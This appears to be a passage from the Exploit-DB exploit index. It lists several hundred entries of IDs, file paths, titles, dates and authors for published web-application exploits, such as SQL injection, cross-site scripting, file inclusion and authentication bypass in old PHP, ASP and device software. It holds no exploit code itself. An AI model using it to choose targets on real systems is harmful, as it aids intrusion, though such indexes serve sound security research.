+27037,exploits/php/webapps/27037.txt,"TheWebForum 1.2.1 - Multiple Input Validation Vulnerabilities",2006-01-06,"Aliaksandr Hartsuyeu",webapps,php, +27038,exploits/php/webapps/27038.txt,"TinyPHPForum 3.6 - Multiple Directory Traversal Vulnerabilities",2006-01-06,"Aliaksandr Hartsuyeu",webapps,php, +27039,exploits/php/webapps/27039.txt,"Dell Kace 1000 SMA 5.4.742 - SQL Injection",2013-07-23,Vulnerability-Lab,webapps,php, +27356,exploits/php/webapps/27356.txt,"CutePHP CuteNews 1.4.1 - 'index.php' Cross-Site Scripting",2006-03-04,"Roozbeh Afrasiabi",webapps,php, +27357,exploits/php/webapps/27357.txt,"Simplog 1.0.2 - Information Disclosure",2006-03-04,Retard,webapps,php, +27358,exploits/php/webapps/27358.txt,"DVGuestbook 1.0/1.2.2 - 'index.php?page' Cross-Site Scripting",2006-03-06,Liz0ziM,webapps,php, +27359,exploits/php/webapps/27359.txt,"DVGuestbook 1.0/1.2.2 - 'dv_gbook.php?f' Cross-Site Scripting",2006-03-06,Liz0ziM,webapps,php, +27360,exploits/php/webapps/27360.txt,"RunCMS 1.x - 'Bigshow.php' Cross-Site Scripting",2006-03-06,"Roozbeh Afrasiabi",webapps,php, +27042,exploits/ios/webapps/27042.txt,"Photo Server 2.0 iOS - Multiple Vulnerabilities",2013-07-23,Vulnerability-Lab,webapps,ios, +27048,exploits/php/webapps/27048.txt,"AppServ Open Project 2.4.5 - Remote File Inclusion",2006-01-09,Xez,webapps,php, +27052,exploits/php/webapps/27052.txt,"427BB 2.2 - 'showthread.php' SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",webapps,php, +27053,exploits/php/webapps/27053.txt,"Venom Board - 'Post.php3' Multiple SQL Injections",2006-01-09,"Aliaksandr Hartsuyeu",webapps,php, +27054,exploits/php/webapps/27054.txt,"427BB 2.2 - Authentication Bypass",2006-01-09,"Aliaksandr Hartsuyeu",webapps,php, +27058,exploits/php/webapps/27058.txt,"PHP-Nuke 7.7 EV Search Module - SQL Injection",2006-01-09,Lostmon,webapps,php, +27059,exploits/php/webapps/27059.txt,"Xoops Pool Module - IMG Tag HTML Injection",2006-01-09,night_warrior771,webapps,php, +27060,exploits/php/webapps/27060.txt,"PHP-Nuke News Submission Story - Text Field Cross-Site Scripting",2006-01-09,night_warrior771,webapps,php, +27061,exploits/cgi/webapps/27061.txt,"Hummingbird Collaboration - Crafted URL File Property Obscuration Download",2006-01-10,"Luca Carettoni",webapps,cgi, +27062,exploits/cgi/webapps/27062.txt,"Hummingbird Collaboration - Application Cookie Internal Network Information Disclosure",2006-01-10,"Luca Carettoni",webapps,cgi, +27063,exploits/asp/webapps/27063.txt,"WebWiz Forums - 'Search_form.asp' Cross-Site Scripting",2006-01-10,nukedx,webapps,asp, +27064,exploits/php/webapps/27064.txt,"Orjinweb - 'index.php' Remote File Inclusion",2006-01-10,serxwebun,webapps,php, +27067,exploits/php/webapps/27067.txt,"MyPHPim - 'calendar.php3?cal_id' SQL Injection",2006-01-11,"Aliaksandr Hartsuyeu",webapps,php, +27068,exploits/php/webapps/27068.txt,"MyPHPim - Login Page pass Field SQL Injection",2006-01-11,"Aliaksandr Hartsuyeu",webapps,php, +27070,exploits/php/webapps/27070.txt,"Interspire TrackPoint NX - 'index.php' Cross-Site Scripting",2006-01-12,"M.Neset KABAKLI",webapps,php, +27071,exploits/asp/webapps/27071.txt,"Fog Creek Software FogBugz 4.0 29 - 'default.asp' Cross-Site Scripting",2006-01-12,"M.Neset KABAKLI",webapps,asp, +27075,exploits/php/webapps/27075.txt,"TankLogger 2.4 General Functions Script - SQL Injection",2006-01-12,"Aliaksandr Hartsuyeu",webapps,php, +27076,exploits/hardware/webapps/27076.txt,"FOSCAM IP-Cameras - Improper Access Restrictions",2013-07-24,"Core Security",webapps,hardware,80 +27077,exploits/php/webapps/27077.txt,"DCP Portal 5.3/6.0/6.1 - Multiple Input Validation Vulnerabilities",2006-01-13,night_warrior771,webapps,php, +27078,exploits/php/webapps/27078.txt,"Alstrasoft Template Seller Pro 3.25 - 'Fullview.php' Cross-Site Scripting",2006-01-13,night_warrior771,webapps,php, +27079,exploits/asp/webapps/27079.txt,"Web Host Automation Ltd. Helm 3.2.8 - 'ForgotPassword.asp' Cross-Site Scripting",2006-01-13,"M.Neset KABAKLI",webapps,asp, +27080,exploits/php/webapps/27080.txt,"EZDatabaseRemote 2.0 - PHP Script Code Execution",2006-01-14,r0t3d3Vil,webapps,php, +27081,exploits/cgi/webapps/27081.txt,"Ultimate Auction 3.67 - Item.pl Cross-Site Scripting",2006-01-14,querkopf,webapps,cgi, +27083,exploits/asp/webapps/27083.txt,"SimpleBlog 2.1 - Multiple Input Validation Vulnerabilities",2006-01-16,Zinho,webapps,asp, +27084,exploits/php/webapps/27084.txt,"Bit 5 Blog 8.1 - 'index.php' SQL Injection",2006-01-16,"Aliaksandr Hartsuyeu",webapps,php, +27085,exploits/php/webapps/27085.txt,"Bit 5 Blog 8.1 - 'addcomment.php' HTML Injection",2006-01-16,"Aliaksandr Hartsuyeu",webapps,php, +27086,exploits/php/webapps/27086.txt,"White Album 2.5 - 'Pictures.php' SQL Injection",2006-01-16,liz0,webapps,php, +27087,exploits/php/webapps/27087.txt,"GeoBlog 1.0 - 'viewcat.php' SQL Injection",2005-01-16,"Aliaksandr Hartsuyeu",webapps,php, +27088,exploits/cgi/webapps/27088.txt,"Faq-O-Matic 2.711 - Multiple Cross-Site Scripting Vulnerabilities",2006-01-16,Preddy,webapps,cgi, +27091,exploits/cgi/webapps/27091.txt,"Ultimate Auction 3.67 - ItemList.pl Cross-Site Scripting",2006-01-16,querkopf,webapps,cgi, +27092,exploits/php/webapps/27092.txt,"GTP iCommerce - Multiple Cross-Site Scripting Vulnerabilities",2006-01-16,Preddy,webapps,php, +27093,exploits/php/webapps/27093.txt,"EZDatabase 2.1.1 - 'index.php' Cross-Site Scripting",2006-01-16,"Josh Zlatin-Amishav",webapps,php, +27097,exploits/php/webapps/27097.txt,"PHPXplorer 0.9.33 - 'Workspaces.php' Directory Traversal",2006-01-16,"Oriol Torrent Santiago",webapps,php, +27098,exploits/php/webapps/27098.txt,"RedKernel Referrer Tracker 1.1.0-3 - 'Rkrt_stats.php' Cross-Site Scripting",2006-01-16,Preddy,webapps,php, +27099,exploits/php/webapps/27099.txt,"BlogPHP 1.0 - 'index.php' SQL Injection",2006-01-16,"Aliaksandr Hartsuyeu",webapps,php, +27100,exploits/php/webapps/27100.txt,"microBlog 2.0 - 'index.php' Multiple SQL Injections",2006-01-17,"Aliaksandr Hartsuyeu",webapps,php, +27102,exploits/php/webapps/27102.txt,"PowerPortal 1.1/1.3 - 'index.php' Cross-Site Scripting",2006-01-17,night_warrior771,webapps,php, +27103,exploits/php/webapps/27103.txt,"PowerPortal 1.1/1.3 - 'search.php' Cross-Site Scripting",2006-01-17,night_warrior771,webapps,php, +27104,exploits/php/webapps/27104.txt,"aoblogger 2.3 - URL BBcode Cross-Site Scripting",2006-01-17,"Aliaksandr Hartsuyeu",webapps,php, +27105,exploits/php/webapps/27105.txt,"aoblogger 2.3 - 'login.php?Username' SQL Injection",2006-01-17,"Aliaksandr Hartsuyeu",webapps,php, +27106,exploits/php/webapps/27106.txt,"aoblogger 2.3 - 'create.php' Unauthenticated Entry Creation",2006-01-17,"Aliaksandr Hartsuyeu",webapps,php, +27107,exploits/php/webapps/27107.txt,"PHPXplorer 0.9.33 - 'action.php' Directory Traversal",2006-01-16,liz0,webapps,php, +27109,exploits/php/webapps/27109.txt,"Phpclanwebsite 1.23.1 - BBCode IMG Tag Script Injection",2005-12-28,"kurdish hackers team",webapps,php, +27110,exploits/php/webapps/27110.txt,"EggBlog 2.0 - 'id' SQL Injection",2006-01-18,alex@evuln.com,webapps,php, +27111,exploits/php/webapps/27111.txt,"EggBlog 2.0 - 'message' Cross-Site Scripting",2006-01-18,alex@evuln.com,webapps,php, +27112,exploits/php/webapps/27112.txt,"SaralBlog 1.0 - Multiple Input Validation Vulnerabilities",2006-01-18,"Aliaksandr Hartsuyeu",webapps,php, +27114,exploits/php/webapps/27114.txt,"WebspotBlogging 3.0 - 'login.php' SQL Injection",2006-01-19,"Aliaksandr Hartsuyeu",webapps,php, +27115,exploits/cgi/webapps/27115.txt,"Rockliffe MailSite 5.3.4/6.1.22/7.0.3 - HTTP Mail Management Cross-Site Scripting",2006-01-20,"OS2A BTO",webapps,cgi, +27116,exploits/php/webapps/27116.txt,"NewsPHP - 'index.php' Multiple SQL Injections",2006-01-23,SAUDI,webapps,php, +27117,exploits/php/webapps/27117.txt,"BlogPHP 1.2 - Multiple SQL Injections",2006-01-20,imei,webapps,php, +27118,exploits/php/webapps/27118.pl,"RCBlog 1.0.3 - 'index.php' Directory Traversal",2006-01-20,"Aliaksandr Hartsuyeu",webapps,php, +27119,exploits/php/webapps/27119.txt,"e-moBLOG 1.3 - Multiple SQL Injections",2006-01-23,"Aliaksandr Hartsuyeu",webapps,php, +27120,exploits/php/webapps/27120.txt,"AZ Bulletin Board 1.0.x/1.1 - 'post.php' HTML Injection",2006-01-23,"Roozbeh Afrasiabi",webapps,php, +27121,exploits/php/webapps/27121.txt,"123 Flash Chat 5.0 - Remote Code Injection",2006-01-24,"Jesus Olmos Gonzalez",webapps,php, +27122,exploits/php/webapps/27122.txt,"MyBB 1.0.1/1.0.2 Notepad - 'usercp.php' HTML Injection",2006-01-24,"Roozbeh Afrasiabi",webapps,php, +27123,exploits/php/webapps/27123.txt,"PixelPost 1.4.3 - User Comment HTML Injection",2006-01-24,"Aliaksandr Hartsuyeu",webapps,php, +27124,exploits/php/webapps/27124.txt,"SleeperChat 0.3f - 'index.php' Cross-Site Scripting",2006-01-24,hackologie,webapps,php, +27125,exploits/php/webapps/27125.txt,"miniBloggie 1.0 - 'login.php' SQL Injection",2006-01-24,"Aliaksandr Hartsuyeu",webapps,php, +27126,exploits/php/webapps/27126.txt,"CheesyBlog 1.0 - Multiple HTML Injection Vulnerabilities",2006-01-25,"Aliaksandr Hartsuyeu",webapps,php, +27127,exploits/php/webapps/27127.txt,"PMachine ExpressionEngine 1.4.1 - HTTP Referrer HTML Injection",2006-01-25,"Aliaksandr Hartsuyeu",webapps,php, +27128,exploits/php/webapps/27128.txt,"Windu CMS 2.2 - Multiple Vulnerabilities",2013-07-27,LiquidWorm,webapps,php, +27129,exploits/php/webapps/27129.txt,"Easy Blog by JM LLC - Multiple Vulnerabilities",2013-07-27,Sp3ctrecore,webapps,php, +27130,exploits/php/webapps/27130.txt,"Basic Forum by JM LLC - Multiple Vulnerabilities",2013-07-27,Sp3ctrecore,webapps,php, +27134,exploits/hardware/webapps/27134.pl,"Broadkam PJ871 - Authentication Bypass",2013-07-27,d3c0der,webapps,hardware, +27136,exploits/php/webapps/27136.txt,"Symantec Web Gateway 5.1.0.x - Multiple Vulnerabilities",2013-07-27,"SEC Consult",webapps,php, +27137,exploits/php/webapps/27137.txt,"MyBB 1.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-26,imei,webapps,php, +27138,exploits/php/webapps/27138.txt,"AndoNET Blog 2004.9.2 - 'Comentarios.php' SQL Injection",2006-01-26,"Aliaksandr Hartsuyeu",webapps,php, +27139,exploits/php/webapps/27139.txt,"My Little Homepage Products - BBCode Link Tag Script Injection",2006-01-26,"Aliaksandr Hartsuyeu",webapps,php, +27141,exploits/cgi/webapps/27141.txt,"Elido Face Control - Multiple Directory Traversal Vulnerabilities",2006-01-26,"HSC Security Group",webapps,cgi, +27142,exploits/asp/webapps/27142.txt,"ASPThai Forums 8.0 - 'login.asp' SQL Injection",2006-01-19,code.shell,webapps,asp, +27143,exploits/asp/webapps/27143.txt,"ZixForum 1.12 - 'forum.asp' Multiple SQL Injections",2005-12-15,"Tran Viet Phuong",webapps,asp, +27146,exploits/php/webapps/27146.txt,"sPaiz-Nuke - 'modules.php' Cross-Site Scripting",2006-01-30,night_warrior771,webapps,php, +27147,exploits/php/webapps/27147.txt,"PmWiki 2.1 - Multiple Input Validation Vulnerabilities",2006-01-30,aScii,webapps,php, +27149,exploits/php/webapps/27149.txt,"Ashwebstudio Ashnews 0.83 - Cross-Site Scripting",2006-01-30,0o_zeus_o0,webapps,php, +27151,exploits/asp/webapps/27151.txt,"Daffodil CRM 1.5 - 'Userlogin.asp' SQL Injection",2006-01-30,preben@watchcom.no,webapps,asp, +27153,exploits/php/webapps/27153.txt,"Cerberus Helpdesk 2.7 - 'Clients.php' Cross-Site Scripting",2006-01-31,preben@watchcom.no,webapps,php, +27154,exploits/php/webapps/27154.txt,"Farsinews 2.1 - 'Loginout.php' Remote File Inclusion",2006-01-31,"Hamid Ebadi",webapps,php, +27155,exploits/php/webapps/27155.txt,"MyBB 1.0/1.1 - 'index.php' Referrer Cookie SQL Injection",2006-01-31,Devil-00,webapps,php, +27156,exploits/php/webapps/27156.txt,"SZUserMgnt 1.4 - 'Username' SQL Injection",2006-02-01,"Aliaksandr Hartsuyeu",webapps,php, +27157,exploits/php/webapps/27157.txt,"SPIP 1.8/1.9 - Multiple SQL Injections",2006-02-01,Siegfried,webapps,php, +27158,exploits/php/webapps/27158.txt,"SPIP 1.8/1.9 - 'index.php3' Cross-Site Scripting",2006-02-01,Siegfried,webapps,php, +27160,exploits/asp/webapps/27160.txt,"SoftMaker Shop - Multiple Cross-Site Scripting Vulnerabilities",2006-02-02,preben@watchcom.no,webapps,asp, +27161,exploits/asp/webapps/27161.txt,"CyberShop Ultimate E-Commerce - Multiple Cross-Site Scripting Vulnerabilities",2006-02-02,B3g0k,webapps,asp, +27162,exploits/php/webapps/27162.txt,"cPanel 10.8.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-02-03,"Simo Ben Youssef",webapps,php, +27163,exploits/cgi/webapps/27163.txt,"IBM Tivoli Access Manager Plugin - Directory Traversal",2006-02-04,"Timothy D. Morgan",webapps,cgi, +27164,exploits/php/webapps/27164.txt,"UBBCentral UBB.Threads 6.3 - 'showflat.php' SQL Injection",2006-01-29,k-otik,webapps,php, +27165,exploits/php/webapps/27165.txt,"Beehive Forum 0.6.2 - 'index.php' SQL Injection",2005-12-22,trueend5,webapps,php, +27166,exploits/php/webapps/27166.txt,"EyeOS 0.8.x - Session Remote Command Execution",2006-02-07,"James Bercegay",webapps,php, +27167,exploits/php/webapps/27167.txt,"MyBB 1.0.3 - 'moderation.php' SQL Injection",2006-02-07,imei,webapps,php, +27169,exploits/asp/webapps/27169.txt,"Webeveyn Whomp! Real Estate Manager 2005 - Login SQL Injection",2006-02-08,night_warrior771,webapps,asp, +27170,exploits/php/webapps/27170.txt,"vwdev - 'index.php' SQL Injection",2006-02-08,"Omid Aghababaei",webapps,php, +27172,exploits/php/webapps/27172.txt,"SPIP 1.8.2 - 'Spip_RSS.php' Remote Command Execution",2006-02-08,rgod,webapps,php, +27173,exploits/php/webapps/27173.txt,"CPAINT 1.3/2.0 - 'TYPE.php' Cross-Site Scripting",2006-02-08,"James Bercegay",webapps,php, +27174,exploits/asp/webapps/27174.txt,"GA's Forum Light - 'Archive.asp' SQL Injection",2006-02-07,Dj_Eyes,webapps,asp, +27175,exploits/php/webapps/27175.php,"PwsPHP 1.2.3 - SQL Injection",2006-02-09,papipsycho,webapps,php, +27176,exploits/php/webapps/27176.txt,"Papoo 2.1.x - Multiple Cross-Site Scripting Vulnerabilities",2006-02-09,"Dj Eyes",webapps,php, +27177,exploits/hardware/webapps/27177.html,"TRENDnet TEW-812DRU - Cross-Site Request Forgery/Command Injection Root",2013-07-28,"Jacob Holcomb",webapps,hardware, +27361,exploits/php/webapps/27361.txt,"Invision Power Board 2.1.5 - showtopic SQL Injection",2006-03-06,Mr.SNAKE,webapps,php, +27183,exploits/php/webapps/27183.txt,"Farsinews 2.1/2.5 - 'show_archives.php?template' Traversal Arbitrary File Access",2006-02-10,"Hamid Ebadi",webapps,php, +27184,exploits/php/webapps/27184.txt,"HiveMail 1.2.2/1.3 - 'addressbook.update.php?contactgroupid' Arbitrary PHP Command Execution",2006-02-11,"GulfTech Security",webapps,php, +27185,exploits/php/webapps/27185.txt,"HiveMail 1.2.2/1.3 - 'folders.update.php?folderid' Arbitrary PHP Command Execution",2006-02-11,"GulfTech Security",webapps,php, +27186,exploits/php/webapps/27186.txt,"HiveMail 1.2.2/1.3 - 'index.php' $_SERVER['PHP_SELF'] Cross-Site Scripting",2006-02-11,"GulfTech Security",webapps,php, +27187,exploits/jsp/webapps/27187.py,"OpenEMM-2013 8.10.380.hf13.0.066 - SOAP SQL Injection / Persistent Cross-Site Scripting",2013-07-29,drone,webapps,jsp, +27188,exploits/ios/webapps/27188.txt,"Private Photos 1.0 iOS - Persistent Cross-Site Scripting",2013-07-29,Vulnerability-Lab,webapps,ios, +27189,exploits/ios/webapps/27189.txt,"WebDisk 3.0.2 PhotoViewer iOS - Command Execution",2013-07-29,Vulnerability-Lab,webapps,ios, +27190,exploits/php/webapps/27190.txt,"FluxBB 1.5.3 - Multiple Vulnerabilities",2013-07-29,LiquidWorm,webapps,php, +27192,exploits/php/webapps/27192.txt,"LinPHA 0.9.x/1.0 - 'lang' Local File Inclusion",2006-02-11,rgod,webapps,php, +27193,exploits/php/webapps/27193.txt,"LinPHA 0.9.x/1.0 - 'install.php' Local File Inclusion",2006-02-11,rgod,webapps,php, +27194,exploits/php/webapps/27194.txt,"LinPHA 0.9.x/1.0 - 'sec_stage_install.php' Local File Inclusion",2006-02-11,rgod,webapps,php, +27195,exploits/php/webapps/27195.txt,"LinPHA 0.9.x/1.0 - 'forth_stage_install.php' Local File Inclusion",2006-02-11,rgod,webapps,php, +27197,exploits/php/webapps/27197.txt,"ImageVue 0.16.1 - 'dir.php' Folder Permission Disclosure",2006-02-11,zjieb,webapps,php, +27198,exploits/php/webapps/27198.txt,"ImageVue 0.16.1 - 'readfolder.php?path' Arbitrary Directory Listing",2006-02-11,zjieb,webapps,php, +27199,exploits/php/webapps/27199.txt,"ImageVue 0.16.1 - 'index.php?bgcol' Cross-Site Scripting",2006-02-11,zjieb,webapps,php, +27200,exploits/php/webapps/27200.txt,"ImageVue 0.16.1 - 'upload.php' Unrestricted Arbitrary File Upload",2006-02-11,zjieb,webapps,php, +27201,exploits/php/webapps/27201.txt,"Siteframe Beaumont 5.0.1 - 'search.php?Q' Cross-Site Scripting",2006-02-12,Kiki,webapps,php, +27202,exploits/php/webapps/27202.txt,"Lawrence Osiris DB_eSession 1.0.2 - Class SQL Injection",2006-02-13,"GulfTech Security",webapps,php, +27204,exploits/php/webapps/27204.html,"Virtual Hosting Control System 2.2/2.4 - 'change_password.php' Current Password",2006-02-13,"Roman Medina-Heigl Hernandez",webapps,php, +27205,exploits/php/webapps/27205.html,"Virtual Hosting Control System 2.2/2.4 - 'login.php?check_login()' Authentication Bypass",2006-02-13,"Roman Medina-Heigl Hernandez",webapps,php, +27206,exploits/php/webapps/27206.txt,"XMB Forum 1.8/1.9 - 'u2u.php?Username' Cross-Site Scripting",2006-02-13,"James Bercegay",webapps,php, +27207,exploits/php/webapps/27207.txt,"Clever Copy 2.0/3.0 - Multiple HTML Injection Vulnerabilities",2006-02-13,"Aliaksandr Hartsuyeu",webapps,php, +27208,exploits/php/webapps/27208.txt,"PHP-Nuke 6.x/7.x - 'header.php?Pagetitle' Cross-Site Scripting",2006-02-13,"Janek Vind",webapps,php, +27209,exploits/php/webapps/27209.txt,"Gastebuch 1.3.2 - Cross-Site Scripting",2006-02-13,"Micha Borrmann",webapps,php, +27213,exploits/php/webapps/27213.txt,"QwikiWiki 1.5 - 'search.php' Cross-Site Scripting",2006-02-14,Citynova,webapps,php, +27214,exploits/php/webapps/27214.txt,"DELTAScripts PHP Classifieds 6.20 - 'Member_Login.php' SQL Injection",2006-02-14,"Audun Larsen",webapps,php, +27215,exploits/php/webapps/27215.txt,"sNews - Comment Body Cross-Site Scripting",2006-02-14,joffer,webapps,php, +27216,exploits/php/webapps/27216.txt,"sNews - 'index.php' Multiple SQL Injections",2006-02-14,joffer,webapps,php, +27217,exploits/php/webapps/27217.txt,"dotProject 2.0 - '/modules/projects/gantt.php?dPconfig[root_dir]' Remote File Inclusion",2006-02-14,r.verton,webapps,php, +27218,exploits/php/webapps/27218.txt,"dotProject 2.0 - '/includes/db_connect.php?baseDir' Remote File Inclusion",2006-02-14,r.verton,webapps,php, +27219,exploits/php/webapps/27219.txt,"dotProject 2.0 - '/includes/session.php?baseDir' Remote File Inclusion",2006-02-14,r.verton,webapps,php, +27220,exploits/php/webapps/27220.txt,"dotProject 2.0 - '/modules/projects/gantt2.php?dPconfig[root_dir]' Remote File Inclusion",2006-02-14,r.verton,webapps,php, +27221,exploits/php/webapps/27221.txt,"dotProject 2.0 - '/modules/projects/vw_files.php?dPconfig[root_dir]' Remote File Inclusion",2006-02-14,r.verton,webapps,php, +27222,exploits/php/webapps/27222.txt,"dotProject 2.0 - '/modules/admin/vw_usr_roles.php?baseDir' Remote File Inclusion",2006-02-14,r.verton,webapps,php, +27223,exploits/php/webapps/27223.txt,"dotProject 2.0 - '/modules/public/calendar.php?baseDir' Remote File Inclusion",2006-02-14,r.verton,webapps,php, +27224,exploits/php/webapps/27224.txt,"dotProject 2.0 - '/modules/public/date_format.php?baseDir' Remote File Inclusion",2006-02-14,r.verton,webapps,php, +27225,exploits/php/webapps/27225.txt,"dotProject 2.0 - '/modules/tasks/gantt.php?baseDir' Remote File Inclusion",2006-02-14,r.verton,webapps,php, +27226,exploits/php/webapps/27226.txt,"RunCMS 1.2/1.3 - 'PMLite.php' SQL Injection",2006-02-14,"Hamid Ebadi",webapps,php, +27227,exploits/php/webapps/27227.txt,"WordPress 2.0 - Comment Post HTML Injection",2006-02-15,imei,webapps,php, +27228,exploits/php/webapps/27228.txt,"Mantis 0.x/1.0 - 'view_all_set.php' Multiple Cross-Site Scripting Vulnerabilities",2006-02-15,"Thomas Waldegger",webapps,php, +27229,exploits/php/webapps/27229.txt,"Mantis 0.x/1.0 - 'manage_user_page.php?sort' Cross-Site Scripting",2006-02-15,"Thomas Waldegger",webapps,php, +27230,exploits/php/webapps/27230.txt,"My Blog 1.63 - BBCode HTML Injection",2006-02-15,"Aliaksandr Hartsuyeu",webapps,php, +27236,exploits/php/webapps/27236.txt,"MyBB 1.0.3 - 'private.php' Multiple SQL Injections",2006-02-15,imei,webapps,php, +27237,exploits/php/webapps/27237.txt,"HTML::BBCode 1.03/1.04 - HTML Injection",2006-02-15,"Aliaksandr Hartsuyeu",webapps,php, +27238,exploits/php/webapps/27238.php,"Dreamcost HostAdmin 3.0 - 'index.php' Remote File Inclusion",2006-02-16,ReZEN,webapps,php, +27239,exploits/php/webapps/27239.txt,"BirthSys 3.1 - Multiple SQL Injections",2006-02-15,"Aliaksandr Hartsuyeu",webapps,php, +27240,exploits/php/webapps/27240.txt,"MyBB 1.0.2/1.0.3 - 'Managegroup.php' SQL Injection",2006-02-16,imei,webapps,php, +27242,exploits/php/webapps/27242.txt,"MyBB 1.0.3 - 'Managegroup.php' Cross-Site Scripting",2006-02-16,imei,webapps,php, +27243,exploits/php/webapps/27243.txt,"Siteframe Beaumont 5.0.1/5.0.2 - 'page.php' HTML Injection",2006-02-16,federico.alice@tiscali.it,webapps,php, +27245,exploits/php/webapps/27245.txt,"V-Webmail 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-02-17,$um$id,webapps,php, +27247,exploits/php/webapps/27247.txt,"E107 Website System 0.7.2 Chatbox Plugin - HTML Injection",2006-02-18,"marc & shb",webapps,php, +27248,exploits/php/webapps/27248.txt,"Webpagecity WPC easy - SQL Injection",2006-02-18,murfie,webapps,php, +27249,exploits/php/webapps/27249.html,"PHP-Nuke 7.x - CAPTCHA Bypass",2006-02-18,waraxe,webapps,php, +27250,exploits/php/webapps/27250.txt,"TTS Software Time Tracking Software 3.0 - 'edituser.php' Access Validation",2006-02-20,"Aliaksandr Hartsuyeu",webapps,php, +27251,exploits/php/webapps/27251.txt,"Magic Calendar Lite 1.02 - 'index.php' SQL Injection",2006-02-20,"Aliaksandr Hartsuyeu",webapps,php, +27252,exploits/php/webapps/27252.txt,"CuteNews 1.4.1 - 'show_news.php' Cross-Site Scripting",2006-02-20,imei,webapps,php, +27254,exploits/php/webapps/27254.txt,"PostNuke 0.6x/0.7x NS-Languages Module - 'language' Cross-Site Scripting",2006-02-21,"Maksymilian Arciemowicz",webapps,php, +27255,exploits/php/webapps/27255.txt,"PostNuke 0.6x/0.7x NS-Languages Module - 'language' SQL Injection",2006-02-21,"Maksymilian Arciemowicz",webapps,php, +27256,exploits/php/webapps/27256.txt,"RunCMS 1.x - 'Ratefile.php' Cross-Site Scripting",2006-02-22,"Roozbeh Afrasiabi",webapps,php, +27259,exploits/php/webapps/27259.txt,"Noah's Classifieds 1.0/1.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,trueend5,webapps,php, +27260,exploits/php/webapps/27260.txt,"Noah's Classifieds 1.0/1.3 - Search Page SQL Injection",2006-02-22,trueend5,webapps,php, +27261,exploits/php/webapps/27261.txt,"Noah's Classifieds 1.0/1.3 - Local File Inclusion",2006-02-22,trueend5,webapps,php, +27262,exploits/php/webapps/27262.txt,"Noah's Classifieds 1.0/1.3 - 'index.php' Remote File Inclusion",2006-02-22,trueend5,webapps,php, +27263,exploits/php/webapps/27263.txt,"Dragonfly CMS 9.0.6 1 Your_Account Module - Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,Lostmon,webapps,php, +27264,exploits/php/webapps/27264.txt,"Dragonfly CMS 9.0.6 1 News Module - Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,Lostmon,webapps,php, +27265,exploits/php/webapps/27265.txt,"Dragonfly CMS 9.0.6.1 Stories_Archive Module - Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,Lostmon,webapps,php, +27266,exploits/php/webapps/27266.txt,"Dragonfly CMS 9.0.6.1 Web_Links Module - Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,Lostmon,webapps,php, +27267,exploits/php/webapps/27267.txt,"Dragonfly CMS 9.0.6.1 Surveys Module - Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,Lostmon,webapps,php, +27268,exploits/php/webapps/27268.txt,"Dragonfly CMS 9.0.6.1 Downloads Module - 'c' Cross-Site Scripting",2006-02-22,Lostmon,webapps,php, +27269,exploits/php/webapps/27269.txt,"Dragonfly CMS 9.0.6.1 Coppermine Module - 'album' Cross-Site Scripting",2006-02-22,Lostmon,webapps,php, +27494,exploits/php/webapps/27494.txt,"phpMyFamily 1.4.1 - 'Track.php' Cross-Site Scripting",2006-03-28,matrix_killer,webapps,php, +27495,exploits/php/webapps/27495.txt,"PHPCOIN 1.2 - 'mod_print.php?fs' Cross-Site Scripting",2006-03-28,r0t,webapps,php, +27496,exploits/php/webapps/27496.txt,"PHPCOIN 1.2 - 'mod.php?fs' Cross-Site Scripting",2006-03-28,r0t,webapps,php, +27272,exploits/php/webapps/27272.txt,"SocialEngine Timeline Plugin 4.2.5p9 - Arbitrary File Upload",2013-08-02,spyk2r,webapps,php, +27274,exploits/php/webapps/27274.txt,"Ginkgo CMS - 'index.php?rang' SQL Injection",2013-08-02,Raw-x,webapps,php, +27275,exploits/php/webapps/27275.txt,"FunGamez - Arbitrary File Upload",2013-08-02,cr4wl3r,webapps,php, +27276,exploits/php/webapps/27276.html,"BigACE 2.7.8 - Cross-Site Request Forgery (Add Admin)",2013-08-02,"Yashar shahinzadeh",webapps,php, +27279,exploits/php/webapps/27279.txt,"vTiger CRM 5.4.0 SOAP - Multiple Vulnerabilities",2013-08-02,EgiX,webapps,php, +27281,exploits/php/webapps/27281.txt,"Telmanik CMS Press 1.01b - 'pages.php?page_name' SQL Injection",2013-08-02,"Anarchy Angel",webapps,php, +27283,exploits/hardware/webapps/27283.txt,"D-Link DIR-645 1.03B08 - Multiple Vulnerabilities",2013-08-02,"Roberto Paleari",webapps,hardware, +27284,exploits/hardware/webapps/27284.txt,"INSTEON Hub 2242-222 - Lack of Web and API Authentication",2013-08-02,"Trustwave's SpiderLabs",webapps,hardware, +27286,exploits/hardware/webapps/27286.txt,"MiCasaVerde VeraLite 1.5.408 - Multiple Vulnerabilities",2013-08-02,"Trustwave's SpiderLabs",webapps,hardware, +27287,exploits/php/webapps/27287.txt,"Cotonti 0.9.13 - SQL Injection",2013-08-02,"High-Tech Bridge SA",webapps,php, +27288,exploits/hardware/webapps/27288.txt,"Western Digital My Net Wireless Routers - Password Disclosure",2013-08-02,"Kyle Lovett",webapps,hardware, +27289,exploits/hardware/webapps/27289.txt,"TP-Link TL-SC3171 IP Cameras - Multiple Vulnerabilities",2013-08-02,"Core Security",webapps,hardware, +27290,exploits/php/webapps/27290.txt,"WordPress Plugin Better WP Security - Persistent Cross-Site Scripting",2013-08-02,"Richard Warren",webapps,php, +27291,exploits/windows/webapps/27291.txt,"Oracle Hyperion 11 - Directory Traversal",2013-08-02,"Richard Warren",webapps,windows,19000 +27298,exploits/php/webapps/27298.txt,"Web Calendar Pro - 'Dropbase.php' SQL Injection",2006-02-23,ReZEN,webapps,php, +27299,exploits/php/webapps/27299.txt,"NOCC 1.0 - 'error.php?html_error_occurred' Cross-Site Scripting",2006-02-23,rgod,webapps,php, +27300,exploits/php/webapps/27300.txt,"NOCC 1.0 - 'filter_prefs.php?html_filter_select' Cross-Site Scripting",2006-02-23,rgod,webapps,php, +27301,exploits/php/webapps/27301.txt,"NOCC 1.0 - 'no_mail.php?html_no_mail' Cross-Site Scripting",2006-02-23,rgod,webapps,php, +27302,exploits/php/webapps/27302.txt,"NOCC 1.0 - 'html_bottom_table.php' Multiple Cross-Site Scripting 